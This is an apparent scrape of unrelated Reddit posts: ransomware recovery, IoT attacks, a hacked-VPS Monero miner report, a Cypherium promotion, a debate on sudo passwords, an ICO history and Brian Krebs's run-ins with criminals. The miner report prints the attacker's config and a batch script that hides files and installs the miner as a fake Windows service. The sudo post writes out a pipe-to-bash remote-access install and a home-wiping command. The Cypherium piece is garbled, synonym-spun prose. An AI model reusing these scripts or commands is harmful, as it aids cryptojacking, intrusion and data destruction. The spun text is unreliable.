Ransomware is a cryptovirus, which means it uses cryptography in combination with malware to lock your files. Modern cryptography uses sophisticated mathematical equations (algorithms) and secret keys to encrypt and decrypt data. If strong encryption is used, it can take thousands, if not millions of years to break the encryption given the strength of today’s computers.
Encryption is a security tool created with the intent of data protection. It is a defensive tool to provide security, privacy, and authentication. Sadly, ransomware attackers are using it as a weapon against innocent victims.

How do I know if the encryption can be broken?

You can start off with this free ransomware identification resource to determine the feasibility of decryption. You will need to upload the ransom note and a sample file into the ID-Ransomware website, and it will tell you if there is a free decrypter or if it is an unknown ransomware variant. Please note that the tool is not always 100% accurate. If the variant is still under analysis, you will need a malware or encryption analyst to determine whether or not there is a possibility for decryption.
Encryption is designed to be unbreakable, which is why security researchers can’t simply make a tool for ransomware decryption. These unbreakable encryptions protect our bank accounts, trade secrets, government data, and mobile communications, among other things. It would be a significant security concern if there were a master decryption tool that could break encryption algorithms.

4. Paying the ransom to decrypt ransomware files

If the encryption is too strong, the only way to obtain the decryption key for your files is to pay the ransom. Many ransomware victims don’t have time on their side because they are facing significant business disruption. Each minute that passes could be a lost client, or worse for a medical organization.
Here is a list of the most prevalent ransomware variants that are known to be “cryptographically secure,” which means that Proven Data or the security community has confirmed the encryption is unbreakable:

I don’t want to pay the hackers ransom.

Businesses and individuals have the option of choosing not to pay the ransom in a ransomware attack to regain access to their files. For personal, political, or moral reasons, there has been resentment of the ransomware economy, and victims do not have to engage in extortion. If paying the ransom is the only option, you should know what to expect before considering moving forward.

How a ransomware recovery specialist can help

If you do decide to use a ransomware recovery company and if there is one thing you get out of this article, it is this: You should always question how a ransomware recovery company is recovering your data. If you are unsure, asking the right questions will ensure a transparent experience:
A ransomware recovery specialist can analyze your current situation and determine what options are available to you at the time of the inquiry. A competent and experienced ransomware recovery company should be able to provide the following:
Understanding how your files were affected by ransomware in the first place will provide you with the insight needed to prevent another attack. Whether you choose Proven Data or another company to decrypt your ransomware files, it’s important to know what unknowns there may be out there.
Our threat intelligence that we’ve gathered from the thousands of previous cases enable you to make informed decisions in helping restore your data after a ransomware attack. If you require a company with such experience, we’re standing by to assist 24/7.
submitted by Proven_Data to u/Proven_Data [link] [comments]

IoT Attacks, Hacker Motivations, and Recommended Countermeasures

IoT Attacks, Hacker Motivations, and Recommended Countermeasures


Illustration: © IoT For All
Businesses worldwide spent $1.5 billion on IoT security in 2019. When it comes to connecting devices via cellular IoT, the selling-point is typically the data and derived insights–this is where the customer sees real value, more so than in any security benefits. That said, IoT solution providers not taking security measures into consideration are risking significant revenue and reputation loss in the event of a security breach–both for their own business as well as their customer’s business.
In the worst cases, the harm done from one security breach will far outweigh any previously created customer value. IoT connectivity providers that can explain and demonstrate their security concepts will gain a competitive advantage.

Why Are Hackers Focused on IoT?

IoT attacks increased by 900% in 2019. So, why are hackers increasingly targeting IoT devices? There are several explanations:
  1. Lack of security software on the devices: Opposed to regular computers, IoT devices do not have a firewall or virus scanner.
  2. Less experienced device producers: The businesses usually come from the industry vertical and often are lacking the IT security expertise of servecomputer manufacturers.
  3. Multiple devices with the same security mechanisms: Once an attack works with one device it will work with thousands.
  4. IoT devices are out of reach: device owners deploy their machines remotely. Often an owner won’t realize that the devices have been compromised until it is too late. Once an attacker has control over a device, it could run all day long before being physically shut down by the owner.

Who Are the Attackers and What Motivates Them?

  • Amateur hackers and script kiddies – usually their objective is fame among their peers, either by targeting a high-profile victim or by demonstrating an ability to infect many devices in a single attack.
  • Governments/Intelligence organizations – acting in the safety of their citizens, intelligence agencies attempt to secure access to important information.
  • Political interest groups – they attack organizations that they think are morally corrupt. Examples are groups like anonymous.
  • Criminal businesses – organizations that take advantage of vulnerabilities within the target to generate revenue for themselves.
The criminal businesses mentioned above are typically set up as ordinary businesses and are especially relevant in the IoT domain. Their objective is to gain control over a large number of IoT devices and make money out of them, often in one of the following ways:
  • Selling Distributed Denial of Service attacks – like webstresser.org (more information via Forbes)
  • Using devices for Bitcoin mining (more information via CNBC)
  • Blocking the device operation until the owner pays a ransom (ransomware)

How Do IoT Attacks Work?

Mirai

The most common IoT attack today is the Mirai malware, which originated in 2016. The malware scans the public internet for IoT devices and tries to establish a remote telnet connection using a list of common factory default usernames and passwords. As soon as one device is infected, the malware begins scanning for more victims. All devices become part of the Mirai botnet which is then steered through the attacker’s command and control center. The attackers then execute a DDoS attack, on behalf of their customers, to a target destination in order to take down the servers of the victims.

Stuxnet

The Stuxnet computer worm was first uncovered in 2010. The malware first injects Microsoft Windows machines exploiting zero-day exploit or outdated OS versions; initially it spread over USB flash drives. On the Windows machine it looks for the Siemens Step7 software that controls the Siemens programmable logic controller (PLC). With the Step7 software it then installs itself on the IoT device and takes over control. Stuxnet once targeted Iranian facilities and reportedly severely harmed the Iranian atomic program.

Silex/Brickerbot

While Brickerbot was discovered in 2017 and Silex appeared in 2019, they have a common attack pattern. Like Mirai, the software scans the public internet and tries to log in to the IoT device with default and weak login and password combinations. After infection, the software overwrites all data and deletes the network configuration, which makes the IoT device unusable, unless someone can physically get a hand on the device.

Countermeasures to Guard Against Attacks

As seen in the Stuxnet attack, IoT devices in the same network as other machines can be impacted by the vulnerabilities of those other machines. To avoid this, using a dedicated network infrastructure is recommended, instead of using shared LAN or Wi-Fi networks. Alternatively, using cellular communication that separates the communication of the different machines is also preferred.
The Mirai and Silex / Brickerbot malware show the value of having random and unique log-in credentials for the different devices – this could have prevented the above-mentioned attack. While the devices allowed for remote access by their owners, the access was granted via the unsecured public internet. A more secure way to get remote access to IoT devices is to use IPSec or Intra-Cloud Connect, avoiding the exposure of public Internet.
One way to prevent attempts to steal remote access to IoT devices, as well as completely block attacks, is to use a cellular firewall. With a cellular firewall, devices are only permitted to communicate with a defined subset of IP addresses. The firewall itself is not located on the individual devices, rather on the cellular connection – out of the attacker’s control.

Key Takeaway: Security First

While the excitement surrounding the brimming potential of IoT connectivity is understandable–and warranted–overlooking IoT device security can prove catastrophic. A robustly secured IoT solution is one that can safely scale globally, enable groundbreaking solutions, and last for years to come.
Originally published by EMnify -| August 12, 2020 iot for all
submitted by kjonesatjaagnet to JAAGNet [link] [comments]

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

CYPHERIUM ENHACES BLOCKCHAIN TECHNOLOGY

OVERVIEW
Rarely has any technology such as blockchain attracted the public and media organisations. Institutions designed to catalyze the fourth industrial revolution are experimenting with technology, and investors have invested hundreds of millions of dollars in blockchain companies. This is a low-risk, experimental environment with error protection. Innovation is a combination of creativity and implementation. Ideas often must go through an evolutionary or cyclical phase before they are ready for commercialization. In fact, the cycle is so long that it is too expensive, inefficient in terms of time and money to generate and generate ideas, and in most cases almost never reaches commercial value. Thus, almost 99% of venture capital firms fail.
A fast growing technology that has come to enhance the blockchain technology is CYPHERIUM.

CHALLENGES FACING THE BLOCKCHAIN TECHNOLOGY
The Bitcoin framework is one of the most notable usage of blockchain innovations in circulated exchange based frameworks. In Bitcoin, each system hub seeks the benefit of putting away a lot of at least one exchanges in another square of the blockchain by comprehending a complex computational math issue, here and there alluded to as a mining verification of-work (POW). Under current conditions, a lot of exchanges is ordinarily put away in another square of the Bitcoin blockchain at a pace of around one new square like clockwork, and each square has an inexact size of one megabyte (MB). As needs be, the Bitcoin framework is dependent upon a looming versatility issue: as it were 3 to 7 exchanges can be handled every second, which is far underneath the quantity of exchanges handled in other exchange based frameworks, for example, the roughly 30,000 exchanges for each second in the Visa™ exchange framework. The most huge disadvantage of the Nakamoto accord is its absence of irrevocability. Conclusion implies once an exchange or an activity is performed on the blockchain, it is for all time recorded on the blockchain and difficult to turn around. This is fundamental to the wellbeing of money related repayment frameworks as exchanges must not be saved once they are made. For Bitcoin's situation, noxious on-screen characters can alter the exchange history given enough hash power, causing a twofold spending assault, given that there is sufficient motivator and money related practicality to complete such assaults. Given that mining gear leasing and botnets are at present predominant around the world, such an assault has become achievable.
Because of this absence of conclusiveness, Nakamoto accord must depend on additional measures, for example, confirmation of-work to forestall pernicious exercises. This hinders the capacity ofNakamoto accord to scale in light of the fact that a exchange must hang tight for various affirmations before coming to "probabilistic absolution".
In this way, wellbeing isn't ensured by Nakamoto agreement, and so as to secure the system, each exchange must experience extra an ideal opportunity to process. For Bitcoin's situation, an exchange isn't considered last until in any event six affirmations. Since Bitcoin can just process a couple of exchanges every second, the exchange cost is preposterously high, making it unreasonable for little installments like shopping for food or eatery feasting. This extraordinarily frustrates Bitcoin's utilization as an installment strategy in this present reality.

CYPHERIUM SOLUTIONS
Cypherium's exclusive algorithm, CypherBFT conquers burdens of the earlier craftsmanship by giving a circulated exchange framework including a gathering of validator hubs that are known to each other in a system however are undefined to the next system hubs in the system. As utilized thus, the gathering of validator hubs might be alluded to as a "Board of trustees" of validator hubs. In a few explanations, the framework reconfigures at least one validator hubs in the Committee dependent on the consequences of confirmation of-work (POW) challenges. As per some uncovered epitomes, a system hub that isn't as of now a validator hub in the Committee might be added to the Committee on the off chance that it effectively finishes a POW challenge. In such an occasion, the system hub may turn into another validator hub in the Committee, supplanting a current validator hub. In elective epitomes, a system hub may become another validator hub in the Committee dependent on a proof-of-stake (POS) accord. In yet another epitome, a system hub may turn into another validator hub in the Committee dependent on a verification of-authority (POA) agreement. In other elective exemplifications, a system hub may turn into a new validator hub in the Committee dependent on a mix of any of POW, POA, and POS accord.

In some revealed exemplifications, the new validator hub replaces a validator hub in the Committee. The substitution might be founded on a foreordained guideline known by all the hubs in the system. For model, the new validator hub may supplant the most established validator hub in the Committee. As indicated by another model, the new validator hub may supplant a validator hub that has been resolved to have gone disconnected, become bargained (e.g., hacked), fizzled (e.g., because of equipment breakdown), or in any case is inaccessible or not, at this point trusted. In the praiseworthy exemplifications, the circulated framework expect that for an adaptation to non-critical failure of f hubs, the Committee incorporates at any rate 3f +1 validator hubs.
Since the validator hubs in the Committee might be every now and again supplanted, for instance, contingent upon the measure of time required to finish the POW challenges, it is hard for vindictive outsiders to identify the total arrangement of validator hubs in the Committee at some random time.

BENEFITS OF CYPHERIUM BLOCKCHAIN TECHNOLOGY
Cypherium runs its exclusive CypherBFT accord, tied down by the HotStuff calculation, and can genuinely offer moment irrevocability for its system clients. With its HotStuff-based structure, the CypherBFT's runtime keeps going just 20-30 milliseconds (ms). A few affirmations are all that is required to for all time acknowledge a proposed obstruct into the blockchain, and it just takes 90ms for these affirmations to come to pass, making the procedure essentially quicker than the two-minutes required by EOS.
Cypherium's CypherBFT, which additionally uses HotStuff, doesn't have to pick between responsiveness and linearity. Cypherium's double blockchain structure incorporates the velocities of a dag, however its review for clients can occur a lot more straightforward and quicker, which adds to the accessibility of data and makes the data more decentralized.
As per some revealed epitomes, the validator hubs in the Committee may get exchange demands from other system hubs, for instance, in a P2P organize. The Committee may incorporate at any rate one validator hub that fills in as a "Pioneer" validator hub; the other validator hubs might be alluded to as "Partner" validator hubs. The Leader hub might be changed occasionally, on request, or inconsistently by the individuals from the Committee. At the point when any validator hub gets another exchange demand from a non-validator hub in the system, the exchange solicitation might be sent to the entirety of the validator hubs in the Committee. Further to the unveiled epitomes, the Pioneer hub facilitates with the other Associate validator hubs to arrive at an accord of an attitude (e.g., acknowledge or dismiss) for an exchange square containing the exchange solicitation and communicates the accord to the whole P2P arrange. In the event that the accord is to acknowledge or in any case approve the exchange demand, the mentioned exchange might be included another square of a blockchain that is known to in any event a portion of the system hubs in the system.
In conclusion, CYPHERIUM'S distributed smart-contracts block-chain is ideal for a good number of use cases which include (but not limited to):
Finance
Messaging
Voting
Notarization
Digital Agreements (Contracts)
Secure data storage
A.I (Artificial Intelligence)
IoT (Internet of Things
To know more about CYPHERIUM kindly visit the following links:
WEBSITE: https://cypherium.io/
GITHUB: https://github.com/cypherium
WHITEPAPER: https://github.com/cypherium/patent/blob/maste15224.0003%20-%20FINAL%20Draft%20Application%20(originally%200003%20invention%201)%20single%20chain%20in%20pipeline.pdf
TELEGRAM: https://t.me/cypherium_supergroup
TWITTER: http://twitter.com/cypheriumchain
FACEBOOK: https://www.facebook.com/CypheriumChain/
AUTHOR: Nwali Jennifer
submitted by iphygurl to BlockchainStartups [link] [comments]

CMV: Requiring a password for "sudo" access on desktop Linux systems is nothing but security theater.

Furthermore: on desktop systems it is perfectly fine to put NOPASSWD:ALL in your /etc/sudoers and similar in /etc/polkit-1/rules.d. In fact, I think this should be the default so users do not get a false sense of security.
For clarity, I'm not saying that all accounts should have sudo access, just saying that there's no meaningful security distinction between "sudo access with password" and "sudo access without password", and the "with password" path does nothing but wasting the user's time and giving them a false sense of security.
Argument #1: compromising a user account effectively compromises everything you care about.
As the relevant XKCD says, if your user account is compromised, the attacker cal already do everything he probably cares about. This includes:
Yes, you can run a remote access tool without root. Starting programs at boot does not require root (see systemctl --user, .bashrc, crontab -e, whatever). Internet access does not require root (see: your browser). I frequently see users thinking that remote access kits require root for some reason. Thanks to the X protocol, keylogging does not require root access either on most systems.
The uses for root-level access I can think of is (1) to infect other users of the system, and (2) to install a rootkit infecting your firmware to survive OS reinstallation. The alleged other users do most likely not exist on desktop systems, and only advanced viruses would put rootkits in firmware—viruses with that level of sophistication may as well use the following point to gain root access after compromising an user account.
Argument #2: compromising access to a user account with sudo access effectively compromises root, and a password check won't stop that.
If your account is in the sudoers file, actively used, and an attacker compromises your account, there are a bazillion ways to get access to root. Here are some examples:
Since Linux has made it effectively impossible to use a system without occasional root usage, you will elevate yourself to root at some point, and at that point the attacker will be able to steal said root access one way or another.
Often-heard counterargument: "If you allow sudo without password and leave your computer unattended without locking it, then some passerby may be able to sudo something, but if sudo required a password, he wouldn't have the time to do one of the advanced techniques above."
Reply: targeted attacks can "curl URL_OF_REMOTE_ACCESS_KIT_INSTALLATION_SCRIPT | bash". Random passerby trolls can ruin your day with "rm -rf ~". Both can be typed fairly quickly and neither requires root-level access.
Although I do consider myself a security-focused person, entering my password upon every sudo is still something I consider a waste of keystrokes and a source of security myths. Since the majority of the Linux world seems to disagree with me, I would like to know whether there's something major I'm overlooking.
submitted by ArchaicArchivist to changemyview [link] [comments]

Writing a short early history of ICOs, starting with altcoins - anything important I've missed?

This is for the forever-forthcoming ICO book. But I figured I needed to talk about altcoins first, the previous generation of shitcoins. This is mostly from dredging early altcoin stuff on Bitcointalk.
There needs to be a bit of the end that leads from The DAO as a world-famous ICO to the 2017 crypto bubble, and ICOs booming in that. Is there anything super-relevant I've missed? In the context of ICOs as we now know them, not just altcoins. Ethereum and Ripple probably.
The early history of ICOs
In the beginning was Bitcoin.
That’s the start for every cryptocurrency and blockchain story. Different parts are important to different people — fun and interesting technology, decentralised money, fighting the oppressive statist jackboots of taxation, sticking it to the man.
What ICOs inherit from Bitcoin is the notion of inventing your own magical Internet money — so you can get rich for free. Bitcoin was released in January 2009 as an open protocol, implemented as open source code — anyone could take a copy of it, twiddle it a bit and have a new coin. It took until April 2011 for the first “fork” of the Bitcoin code to come out — Namecoin, an attempt at a decentralised replacement for the Internet’s Domain Name Service (DNS).[1]
It was another four months until someone came up with a general altcoin, usable as a Bitcoin-style payment system — Ixcoin, on 10 August 2011.[2] The creator, “Thomas Nasakioto” — an anagram of "Satoshi Nakamoto"; he used a picture of Japanese actor Hiroyuki Sanada as his forum avatar — disappeared less than a month later, having scored about 50 bitcoins in the process. “Pretty sure it’s dead,” said one commenter. “It has served his purpose. Many people made quite a few BTC out of it.”[3]
A flood of what were rapidly labeled “altcoins” followed — i0coin, Solidcoin, RRCoin, Tenebrix, Litecoin. The Freenode Internet Relay Chat network started banning cryptocurrency servers that made automated network announcements around this time, rather than deal with what looked “like a botnet using their network.”[4]
The first Initial Coin Offering as we know it is commonly held to be Mastercoin in July 2013.[5] Mastercoin became OmniLayer — the platform for Tether. Mastercoin was the first sale of a token that ran as an application on top of another blockchain — in this case, Bitcoin: “I am VERY excited to announce that I now have a complete specification for building a protocol layer on top of bitcoin (like how HTTP runs on top of TCP/IP).”
Mastercoin didn’t use the phrase “Initial Coin Offering.” The phrase “IPO” — “Initial Public Offering,” in the manner of stock offerings for companies going public — was being used for altcoin offerings by 2014. IronBankCoin used “initial coin offering” and “ICO” by July 2014 — “The initial coin offering will be of 21% of the coin cap during the PoW (Proof of Work) stage” and “Initial Distribution of the Land (ICO info): ICO? Aren't those all scams?”[6]
Mastercoin never really took off as a token platform — that didn’t come until Ethereum made tokens easy to set up in 2015, and The DAO got press worldwide in 2016 by showing just how much money an ICO could pull in. Even as The DAO proceeded to lose $50 million to a hacker five days after launch.
  1. vinced. “(announce) Namecoin - a distributed naming system based on Bitcoin.” BitcoinTalk Bitcoin Forum > Bitcoin > Bitcoin Discussion, 18 April 2011.
  2. Nasakioto. “[ANNOUNCE] Mining on Ixcoin, a new Bitcoin fork.” Ixcoin Forum, 10 August 2011. (archive)
  3. Mindphlux. “Re: What happened to the ixcoin founder? Is Ixcoin dead?” BitcoinTalk Bitcoin Forum > Other > Alternate cryptocurrencies, 9 September 2011.
  4. DannyM. “Ixcoin, I0coin, future forks: Please respect Freenode Network.” BitcoinTalk Bitcoin Forum > Other > Alternate cryptocurrencies, 16 August 2011
  5. Dacoinminster. “OFFICIAL LAUNCH: New Protocol Layer Starting FromNew Protocol Layer Starting From ‘The Exodus Address’.” BitcoinTalk Bitcoin Forum > Bitcoin > Project Development, 31 July 2013.
  6. IronBankCoin. “(Pre-ANN)(IBC) IronBankCoin | 90-day PoW~PoS | Own part of the Known World.” BitcoinTalk Bitcoin Forum > Alternate cryptocurrencies > Announcements (Altcoins), 17 June 2014, updated 28 July 2014.
submitted by dgerard to Buttcoin [link] [comments]

A few stories about Brian Krebs: The independent cybercrime journalist who exposes criminals on the internet

First, a bit of introduction before we get into the living drama that is Brian Krebs.
Brian Krebs has been a journalist for decades, starting in the late 90s. He got his start at The Washington Post, but what he's most famous for are his exposes on criminal businesses and individuals who perpetuate cyber crime worldwide. In 2001, he got his interest in cybercrime piqued when a computer worm locked him out of his own computer. In 2005, he shifted from working as a staff writer at The Washington Post's tech newswire to writing for their security blog, "Security Wire". During his tenure there, he started by focusing on the victims of cybercrime, but later also started to focus on the perpetrators of it as well. His reporting helped lead to the shutdown of McColo, a hosting provider who provided service to some of the world's biggest spammers and hackers. Reports analyzing the shutdown of McColo estimated that global spam volume dropped by between 40 and 70 percent. Further analysis revealed it also played host to child pornography sites, and the Russian Business Network, a major Russian cybercrime ring.
In 2009, Krebs left to start his own site, KrebsOnSecurity. Since then, he's been credited with being the first to report on major events such as Stuxnet and when Target was breached, resulting in the leakage of 40 million cards. He also regularly investigates and reveals criminals' identities on his site. The latter has made him the bane of the world of cybercrime, as well as basically a meme, where criminals will include references like Made by Brian Krebs in their code, or name their shops full of stolen credit cards after him.
One of his first posts on his new site was a selection of his best work. While not particularly dramatic, they serve as an excellent example of dogged investigative work, and his series reveal the trail of takedowns his work has documented, or even contributed to.
And now, a selection of drama involving Krebs. Note, all posts are sarcastically-tinged retellings of the source material which I will link throughout. I also didn't use the real names in my retellings, but they are in the source material. This took way too long to write, and it still does massively condense the events described in the series. Krebs has been involved with feuds with other figures, but I'd argue these tales are the "main" bits of drama that are most suited for here.

Fly on the Wall

By 2013, Krebs was no stranger to cybercriminals taking the fight to the real world. He was swatted previously to the point where the police actually know to give him a ring and see if there'd actually been a murder, or if it was just those wacky hackers at it again. In addition, his identity was basically common knowledge to cybercriminals, who would open lines of credit in his name, or find ways to send him money using stolen credit cards.
However, one particular campaign against him caught his eye. A hacker known as "Fly" aka "Flycracker" aka "MUXACC1" posted on a Russian-language fraud forum he administered about a "Krebs fund". His plan was simple. Raise Bitcoin to buy Heroin off of a darknet marketplace, address it to Krebs, and alert his local police via a spoofed phone call. Now, because Krebs is an investigative journalist, he develops undercover presences on cybercrime forums, and it just so happened he'd built up a presence on this one already.
Guys, it became known recently that Brian Krebs is a heroin addict and he desperately needs the smack, so we have started the "Helping Brian Fund", and shortly we will create a bitcoin wallet called "Drugs for Krebs" which we will use to buy him the purest heroin on the Silk Road. My friends, his withdrawal is very bad, let’s join forces to help the guy! We will save Brian from the acute heroin withdrawal and the world will get slightly better!
Fly had first caught Krebs' attention by taunting him on Twitter, sending him Tweets including insults and abuse, and totally-legit looking links. Probably either laced with malware, or designed to get Krebs' IP. He also took to posting personal details such as Krebs' credit report, directions to his house, and pictures of his front door on LiveJournal, of all places.
So, after spotting the scheme, he alerted his local police that he'd probably have someone sending him some China White. Sure enough, the ne'er-do-wells managed to raise 2 BTC, which at the time was a cool $200 or so. They created an account on the premiere darknet site at the time, The Silk Road under the foolproof name "briankrebs7". They found one seller who had consistently high reviews, but the deal fell through for unknown reasons. My personal theory is the seller decided to Google where it was going, and realized sending a gram of dope into the waiting arms of local law enforcement probably wasn't the best use of his time. Still, the forum members persevered, and found another seller who was running a buy 10 get 2 free promotion. $165 of Bitcoin later, the drugs were on their way to a new home. The seller apparently informed Fly that the shipment should arrive by Tuesday, a fact which he gleefully shared with the forum.
While our intrepid hero had no doubt that the forum members were determined to help him grab the tail of the dragon, he's not one to assume without confirmation, and enlisted the help of a graduate student at UCSD who was researching Bitcoin and anonymity on The Silk Road, and confirmed the address shared by Fly was used to deposit 2 BTC into an account known to be used for money management on the site.
By Monday, an envelope from Chicago had arrived, containing a copy of Chicago confidential. Taped inside were tiny baggies filled with the purported heroin. Either dedicated to satisfied customers, or mathematically challenged, the seller had included thirteen baggies instead of the twelve advertised. A police officer arrived to take a report and whisked the baggies away.
Now, Fly was upset that Krebs wasn't in handcuffs for drug possession, and decided to follow up his stunt by sending Krebs a floral arrangement shaped like a cross, and an accompanying threatening message addressed to his wife, the dire tone slightly undercut by the fact that it was signed "Velvet Crabs". Krebs' curiosity was already piqued from the shenanigans with the heroin, but with the arrival of the flowers decided to dive deeper into the сука behind things.
He began digging into databases from carding sites that had been hacked, but got his first major breakthrough to his identity from a Russian computer forensics firm. Fly had maintained an account on a now-defunct hacking forum, whose database was breached under "Flycracker". It turns out, the email Flycracker had used was also hacked at some point, and a source told Krebs that the email was full of reports from a keylogger Fly had installed on his wife's computer. Now, because presumably his wife wasn't part of, or perhaps even privy to her husband's illicit dealings, her email account happened to be her full legal name, which Krebs was able to trace to her husband. Now, around this time, the site Fly maintained disappeared from the web, and administrators on another major fraud forum started purging his account. This is a step they typically take when they suspect a member has been apprehended by authorities. Nobody knew for sure, but they didn't want to take any chances.
More research by Krebs revealed that the criminals' intuition had been correct, and Fly was arrested in Italy, carrying documents under an assumed name. He was sitting in an Italian jail, awaiting potential extradition to the United States, as well as potentially facing charges in Italy. This was relayed to Krebs by a law enforcement official who simply said "The Fly has been swatted". (Presumably while slowly removing a pair of aviator sunglasses)
While Fly may have been put away, the story between Krebs and Fly wasn't quite over. He did end up being extradited to the US for prosecution, but while imprisoned in Italy, Fly actually started sending Krebs letters. Understandably distrustful after the whole "heroin" thing, his contacts in federal law enforcement tested the letter, and found it to be clean. Inside, there was a heartfelt and personal letter, apologizing for fucking with Krebs in so many ways. He also forgave Krebs for posting his identity online, leading him to muse that perhaps Fly was working through a twelve-step program. In December, he received another letter, this time a simple postcard with a cheerful message wishing him a Merry Christmas and a Happy New Year. Krebs concluded his post thusly:
Cybercrooks have done some pretty crazy stuff to me in response to my reporting about them. But I don’t normally get this kind of closure. I look forward to meeting with Fly in person one day soon now that he will be just a short train ride away. And he may be here for some time: If convicted on all charges, Fly faces up to 30 years in U.S. federal prison.
Fly ultimately was extradited. He plead guilty and was sentenced to 41 months in jail

vDOS and Mirai Break The Internet

Criminals are none too happy when they find their businesses and identities on the front page of KrebsOnSecurity. It usually means law enforcement isn't far behind. One such business was known as vDOS. A DDOS-for-hire (also known as a "booter" or a "stresser") site that found itself hacked, with all their customer records still in their databases leaked. Analysis of the records found that in a four-month time span, the service had been responsible for about 8.81 years worth of attack time, meaning on average at any given second, there were 26 simultaneous attacks running. Interestingly, the hack of vDOS came about from another DDOS-for-hire site, who as it turns out was simply reselling services provided by vDOS. They were far from the only one. vDOS appeared to provide firepower to a large number of different resellers.
In addition to the attack logs, support messages were also among the data stolen. This contained some complaints from various clients who complained they were unable to launch attacks against Israeli IPs. This is a common tactic by hackers to try and avoid unwanted attention from authorities in their country of residence. This was confirmed when two men from Israel were arrested for their involvement in owning and running vDOS. However, this was just the beginning for this bit of drama.
The two men arrested went by the handles "applej4ck" and "Raziel". They had recently published a paper on DDOS attack methods in an online Israeli security magazine. Interestingly, on the same day the men were arrested, questioned, and released on bail, vDOS went offline. Not because it had been taken down by Israeli authorities, not because they had shut it down themselves, but because a DDOS protection firm, BackConnect Security, had hijacked the IP addresses belonging to the company. To spare a lot of technical detail, it's called a BGP hijack, and it basically works by a company saying "Yeah, those are our addresses." It's kind of amazing how much of the internet is basically just secured by the digital equivalent of pinky swears. You can read some more technical detail on Wikipedia. Anyway, we'll get back to BackConnect.
Following the publication of the story uncovering the inner workings of vDOS, KrebsOnSecurity was hit with a record breaking DDOS attack, that peaked at 620/Gbps, nearly double the most powerful DDOS attack previously on record. To put that in perspective, that's enough bandwidth to download 5 simultaneous copies of Interstellar in 4K resolution every single second, and still have room to spare. The attack was so devastating, Akamai, one of the largest providers of DDOS protection in the world had to drop Krebs as a pro bono client. Luckily, Google was willing to step in and place his site under the protection of Google's Project Shield, a free service designed to protect the news sites and journalists from being knocked offline by DDOS attacks.
This attack was apparently in retaliation for the vDOS story, since some of the data sent in the attack included the string "freeapplej4ck". The attack was executed by a botnet of Internet of Things (or IoT) devices. These are those "smart" devices like camera systems, routers, DVRs. Basically things that connect to the cloud. An astounding amount of those are secured with default passwords that can be easily looked up from various sites or even the manufacturers' websites. This was the start of a discovery of a massive botnet that had been growing for years.
Now time for a couple quick side stories:
Dyn, a company who provides DNS to many major companies including Twitter, Reddit, and others came under attack, leaving many sites (including Twitter and Reddit) faltering in the wake of it. Potentially due to one of their engineers' collaboration with Krebs on another story. It turned out that the same botnet that attacked Krebs' site was at least part of the attack on Dyn
And back to BackConnect, that DDOS protection firm that hijacked the IP addresses from vDOS. Well it turns out BGP Hijacks are old hat for the company. They had done it at least 17 times before. Including at least once (purportedly with permission) for the address 1.3.3.7. Aka, "leet". It turns out one of the co-founders of BackConnect actually posted screenshots of him visiting sites that tell you your public IP address in a DDOS mitigation industry chat, showing it as 1.3.3.7. They also used a BGP Hijack against a hosting company and tried to frame a rival DDOS mitigation provider.
Finally, another provider, Datawagon was interestingly implicated in hosting DDOS-for-hire sites while offering DDOS protection. In a Skype conversation where the founder of Datawagon wanted to talk about that time he registered dominos.pizza and got sued for it, he brings up scanning the internet for vulnerable routers completely unprompted. Following the publication of the story about BackConnect, in which he was included in, he was incensed about his portrayal, and argued with Krebs over Skype before Krebs ultimately ended up blocking him. He was subsequently flooded with fake contact requests from bogus or hacked Skype accounts. Shortly thereafter, the record-breaking DDOS attack rained down upon his site.
Back to the main tale!
So, it turns out the botnet of IoT devices was puppeteered by a malware called Mirai. How did it get its name? Well, that's the name its creator gave it, after an anime called Mirai Nikki. How did this name come to light? The creator posted the source code online. (The name part, not the origin. The origin didn't come 'til later.) The post purported that they'd picked it up from somewhere in their travels as a DDOS industry professional. It turns out this is a semi-common tactic when miscreants fear that law enforcement might come looking for them, and having the only copy of the source code of a malware in existence is a pretty strong indicator that you have something to do with it. So, releasing the source to the world gives a veneer of plausible deniability should that eventuality come to pass. So who was this mysterious benefactor of malware source? They went by the name "Anna-senpai".
